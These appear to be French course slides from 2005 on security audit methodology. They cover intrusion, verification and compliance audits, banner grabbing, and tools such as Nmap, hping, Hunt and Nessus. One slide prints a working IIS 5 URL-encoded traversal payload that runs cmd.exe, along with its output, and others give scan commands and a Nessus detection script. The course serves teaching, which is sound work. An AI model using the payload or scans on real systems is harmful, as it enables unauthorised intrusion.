Docstoc

Jour 2

Document Sample
Jour 2 Powered By Docstoc
					  Cours sécurité réseau : Jour 2




       Méthodologie d’Audit




2005             CIEFA
      Plan du cours


   Introduction aux Audits de Sécurité
   L’Audit d’Intrusion
   L’Audit de Vérification
   L’Audit d’Agrément
   Les différentes pistes de l’Audit de Sécurité



    2005                   CIEFA
      Plan du cours


   Introduction aux Audits de Sécurité
   L’Audit d’Intrusion
   L’Audit de Vérification
   L’Audit d’Agrément
   Les différentes pistes de l’Audit de Sécurité



    2005                   CIEFA
      Introduction

    L’Audit de Sécurité est la première étape d’une démarche qui conduit à la définition et à
     la mise en oeuvre d’une politique de sécurité des systèmes d’information.

    L’Audit de Sécurité à pour objectif d’une part de permettre à tout responsable
     informatique de se faire une idée de la vulnérabilité du système d’information dont il a la
     charge, d’autre part de lui permettre de mettre en évidence les points qui sont
     susceptibles d’être améliorés afin d’éviter de se retrouver dans une situation où le
     système serait compromis.

    Il relève de la façon la plus exhaustive qui soit les différentes vulnérabilités du système
     audité, tant sur l’organisation du système d’information, que sur les moyens mis en
     œuvre et la façon dont ils sont utilisés.

    L’Audit de Sécurité touche à tous les divers sous-domaines de l’informatique (réseaux,
     télécommunications, systèmes d’exploitations, logiciels utilisés, etc …) et doit prendre
     en compte leurs interopérabilités.


    2005                                     CIEFA
    Les différents types d’Audit

Il existe trois types d’Audit de Sécurité.
Ces divers Audits ont chacun leur but, et leur utilité, et
Surtout, ils disposent d’une méthodologie qui leur est propre.

      L’Audit d’Intrusion
        Il a pour but la recherche des vulnérabilités de façon active

      L’Audit de Vérification
        Il a pour but l’analyse de l’état d’un système à un moment
       donné

      Audit d’Agrément
        Il a pour but la validation par rapport à un référentiel prédéfini




2005                                         CIEFA
      Nécessité d’un audit ?


      En France :      90% des réseaux informatiques sont vulnérables
                        65% des entreprises sont victimes d’intrusions
                        95% de ces intrusions ne sont même pas détectées

      En 2001, les attaques informatiques ont représenté un coût global de 1600 milliards de dollars.

      En 2001, 85% des entreprises et des services publics américains ont rapporté une intrusion
       informatique telle qu'un vol d'information propriétaire, une fraude financière, l'intrusion de
       personnes extérieures dans leur système, une attaque de déni de service ou un sabotage de
       leurs données ou réseau.

      40% des entreprises interrogées ont rapporté une intrusion par un tiers extérieur en 2004
       (20% en 1997) et 38% ont détecté une attaque de type Déni de service (24% en 1998).

(Source: 2004 Computer Crime & Security Survey, Computer Security Institute).



    2005                                        CIEFA
      Plan du cours


   Introduction aux Audits de Sécurité
   L’Audit d’Intrusion
   L’Audit de Vérification
   L’Audit d’Agrément
   Les différentes pistes de l’Audit de Sécurité



    2005                   CIEFA
      L’Audit d’Intrusion

          Un Audit effectué en se mettant totalement à la place du pirate
           informatique

          Attention : il est réalisé dans les conditions suivantes :
            Sans les exploitant du système d’information
            Après vérification des sauvegardes et mises à jour si nécessaire
            Il dépend de la compétence de l’auditeur

          Méthodes et outils utilisés : les mêmes que les pirates (recherche de
           failles, de vulnérabilités, etc …)

          C’est un Audit Persuasif auprès des hiérarchies



    2005                                       CIEFA
      Tests d’intrusion

      Définition : tentative de compromission de la sécurité

      Types de tests d’intrusion :
           - de l’extérieur : test d’intrusion externe
           - de l’intérieur : audit intrusif interne

      Sans connaissance : intrus externe à l’entreprise
      Avec connaissances internes : reproduit le cas d’un employé malveillant

 Souvent réalisés après résultats de l’audit pour limiter les dégâts (DoS)




    2005                                      CIEFA
      Tests de vulnérabilité

      Vulnérabilités :
            - faille dans un logiciel
            - erreur de configuration d’un équipement

      Outils :
            - Nessus : tout en un
            - Recherche et tests de ports ouverts : Nmap, hping

      Objectifs :
           - Trouver, à distance et de manière automatique, des services ouverts
           - Tenter de déterminer si une vulnérabilité connue est présente




    2005                                   CIEFA
      Plan du cours


   Introduction aux Audits de Sécurité
   L’Audit d’Intrusion
   L’Audit de Vérification
   L’Audit d’Agrément
   Les différentes pistes de l’Audit de Sécurité



    2005                   CIEFA
      Audit de vérification

      Indépendant de tout travail existant, cet Audit permet de se faire une bonne idée de la
       situation au niveau de la sécurité, d’un système d’information

      Le but de cet audit est l’analyse de l’état d’un système ou d’un réseau en se fondant sur les
       composantes de l’entreprise qui influent sur ce système ou sur ce réseau, à savoir :
            - L’organisation (personnel, procédures)
            - Les configuration (réseau, organisationnelle)
            - L’exploitation (ressources)
            - Les compétences (résultats en accords avec les moyens mis en œuvre)
            - Les protocoles utilisés
            - L’interaction entre elles de toutes les composantes précédentes

      Il va permettre en outre une vérification par rapport :
              - Aux bonnes pratiques du métier
              - A la politique de sécurité
              - Aux besoins exprimés par le demandeur


    2005                                           CIEFA
      Exemple d’audit de vérification

     Objectif : déterminer les points faibles d’une architecture

     Méthodologie :
                       - Analyse fonctionnelle
                       - Plan d’adressage, cloisonnement IP
                       - Rôle des sous réseaux et de chaque composant
                       - Redondance des protections
                       - Choix des matériels et logiciels
                       - Recherche des éléments sur lesquels repose la sécurité
                       - Recherche des communications avec l’extérieur
                       - Plan de secours
                       - Résistance au déni de service




    2005                                     CIEFA
      Plan du cours


   Introduction aux Audits de Sécurité
   L’Audit d’Intrusion
   L’Audit de Vérification
   L’Audit d’Agrément
   Les différentes pistes de l’Audit de Sécurité



    2005                   CIEFA
      Audit d’agrément

      L’Audit d’Agrément consiste en le développement d’un ou de plusieurs
       documents d’exigences de sécurité ou de règles d’exploitation qui se veulent les
       plus exhaustives possibles.

      Il sous entend un consensus entre les divers acteurs du système d’information (
       utilisateurs, administrateurs, etc …).

      Il doit être spécifique à une architecture, à un ensemble de produits ou à un
       environnement précis.

      Il doit être accompagné d’un cahier d’agrément expliquant comment vérifier les
       diverses exigences préétablis

      L’Audit d’Agrément vérifie le respect des exigences ou règles par rapport au
       référentiel

    2005                                    CIEFA
      Plan du cours


   Introduction aux Audits de Sécurité
   L’Audit d’Intrusion
   L’Audit de Vérification
   L’Audit d’Agrément
   Les différentes pistes de l’Audit de Sécurité



    2005                   CIEFA
      Analyse des ports classiques


      Ports TCP : la plupart des services classiques sont souvent ouverts (21, 22, 23,
       25, 80, …)

      Ports UDP : scan de port fermé : flag RST
       Facilement filtrable par firewall… => le seul moyen est alors de tester les
       applications courantes ftp

      Scan NMAP (exemple : option –0 sur chaque port => assurance de bonnes
       indications sur l’OS)




    2005                                     CIEFA
      Recherche de bannières

      Service FTP :
       $ ftp 137.194.200.214
       Connected to 137.194.200.214.
       220 FTP server (Hummingbird Communications Ltd. (HCLFTPD)
       Version 6.1.0.0) ready.

      Service SSH :
       $ telnet 137.194.200.214 22
       Trying 137.194.200.214...
       Connected to 137.194.200.214.
       Escape character is '^]'.
       SSH-1.99-OpenSSH_3.0.2p1 Debian 1:3.0.2p1-9

      Service Telnet :
       $ telnet 137.194.200.214
       Debian GNU/Linux 2.2 serveur.ssir.com
       Login :

      Service SMTP :
       $ telnet 137.194.200.214 25
       ...
       220 serveur.ssir.com ESMTP Exim 3.12 #1 Mon, 10 Jun 2002 22:56:32 +0200
    2005                                          CIEFA
     Exemple de faille : serveur IIS
Un serveur IIS 5.x peut être sensible aux attaques de type URL encodées

$ echo "GET /scripts/..%255c..%255c..%255cwinnt/System32/cmd.exe?/c+dir+c:\\ HTTP/1.0 " | stunnel -c -r
      137.194.200.214:443

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0
Server: Microsoft-IIS/5.0
Date: Fri, 17 Jun 2002 19:47:35 GMT
Content-Type: application/octet-stream
Le volume dans le lecteur C n'a pas de nom.
Le numero de serie du volume est 9C5F-0FCD
Repertoire de c:\
01/01/2000 01:19 <DIR> Documents and Settings
01/01/2000 01:19 <DIR> I386
10/06/2002 21:44 <DIR> Inetpub
05/05/2002 19:17 <DIR> My Music
17/06/2002 19:26 <DIR> Program Files
17/05/2002 16:18 600 PUTTY.RND
25/04/2002 06:21 <DIR> TEMP
18/06/2002 20:46 <DIR> WINNT
              1 fichier(s)              1á223á476 octets
              7 Rep(s)                  3á385á342á976 octets libres
  2005                                               CIEFA
      Autres pistes

     En cas de présence d’un routeur passerelle connu du réseau : essai
      d’adresses internes pour l’IP Spoofing …

     Travail sur les TTL (afin de déterminer l’architecture réseau)

     Passage mode passif du FTP (pasv) pour trouver l’adresse interne par
      exemple

     Exploitation de services comme SMTP, etc …

     Failles et exploitations des services DNS mal configurés


    2005                                CIEFA
  Annexes : outils d’attaque


      Nmap
      Hping
      Hunt
      Nessus
      Tcpdump
      Ethereal


2005              CIEFA
      NMAP


      Développé et disponible sur
          http://www.insecure.org

      Scanner de ports et de machines

      Référence de la prise d’empreinte

      Utilisation : « nmap <options> machine »

    2005                      CIEFA
      NMAP : principales options


      nmap –O : OS Fingerprint

      nmap --osscan_guess : Option non référencée donnant les
       résultats probables de la prise d’empreinte en cas d’échec

      nmap –P0 : pas de ping (utile derrière un firewall)

      nmap –PT : TCP Ping

      nmap –p 1:1024 : Liste de ports à scanner

    2005                             CIEFA
   NMAP : osscan_guess

# nmap --osscan_guess -sS -O -p 19-26 -n -P0 192.168.148.31
Starting nmap V. 2.54BETA5 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.148.31):
(The 6 ports scanned but not shown below are in state: closed)
Port       State     Service
22/tcp     open      ssh
25/tcp     open      smtp
TCP Sequence Prediction: Class=random positive increments
                               Difficulty=2830 (Medium)
Aggressive OS guesses: FreeBSD 3.2-STABLE (91%), Microsoft NT 4.0 Server SP5
+ 2047 Hotfixes (90%), Windows 2000 RC1 through final release (90%), Windows
2000 Professional, Build 2128 (90%), Windows Millenium Edition v4.90.3000
(90%), HP-UX 10.20 (89%), Cisco IOS 12.0(3.3)S (perhaps a 7200) (88%),
F5labs Big/IP HA TCP/IP Load Balancer (BSDI kernel/x86) (88%)
No exact OS matches for host (If you know what OS is running on it,
see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
 2005                                CIEFA
      NMAP : principaux types de scan

      nmap –sT (Scan par défaut): connexion TCP

      nmap –sS : TCP SYN scan

      nmap –sF : TCP FIN scan

      nmap –sU : UDP scan

      nmap –sP : ping scan utilisé pour scanner des plages d’adresses

      nmap –s0 : scan de protocoles transportés par IP


    2005                              CIEFA
      HPING



     Boîte à outils permettant de créer des paquets IP

     Permet de tester finement des règles de filtrage

     Analyse les paquets retour précisément




    2005                       CIEFA
      HPING : principales options

      hping –SFRA : bits SYN,FIN,RST,ACK

      Hping –1 : ICMP (-C pour type)

      hping –2 : UDP

      hping –c N : N paquets (défaut : illimité)

      hping –T : Traceroute


    2005                              CIEFA
  HPING




2005      CIEFA
  HPING




2005      CIEFA
      HUNT

      Outil de surveillance réseau évolué

      Permet de surveiller un réseau en reconstituant les
       sessions TCP

      Permet d’insérer des paquets dans une session TCP
       ( Génère une tempête ACK)



    2005                       CIEFA
      TCPDUMP

      Sniffer réseau en ligne de commande

      Fonctionnalités de filtrage avancées (librairie pcap)

      Exemple :
       tcpdump –i eth0 –p host 192.168.2.3




    2005                             CIEFA
  TCPDUMP




2005        CIEFA
    NESSUS
     Sonde d’audit en réseau permettant de :
        Scanner les vulnérabilités réseau
        Scanner les vulnérabilités applicatives (bannières, CGI,
         buffer-overflows,…)

     Élément actif qui réalise les attaques (les plus nocives sont
      désactivées par défaut)
       Attention aux DoS sur les sondes de détection




    2005                             CIEFA
      NESSUS


      Disponible sur http://www.nessus.org

      Clients pour Unix, Windows

      Serveur pour Unix seulement




    2005                      CIEFA
  NESSUS : Fonctionnement




2005            CIEFA
      NESSUS


     Mise à jour régulière des vulnérabilités

     Utilise un langage de script spécifique

     Personnalisation possible




    2005                        CIEFA
     NESSUS : Interface client
#
# The script code starts here
#
port = get_kb_item("Services/www");
if(!port)port = 80;
banner = get_kb_item(string("www/banner/", port));
if(!banner)
{
if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  req = string("GET / HTTP/1.0\r\n\r\n");
  send(socket:soc, data:req);
  banner = recv(socket:soc, length:1024);
  close(soc);
  }
 }
}
if(banner)
{
if(egrep(pattern:"^Server: Zope\/Zope 2\.((0\..*)|(1\.[0-6]))", string:banner))
     security_hole(port);
} 2005                                                      CIEFA
  NESSUS : Interface client




2005            CIEFA
  NESSUS : Interface client




2005            CIEFA
  NESSUS : Interface client




2005            CIEFA
  NESSUS : Interface client




2005            CIEFA
  NESSUS : Interface client




2005            CIEFA
  NESSUS : Interface client




2005            CIEFA

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:3
posted:8/21/2011
language:French
pages:43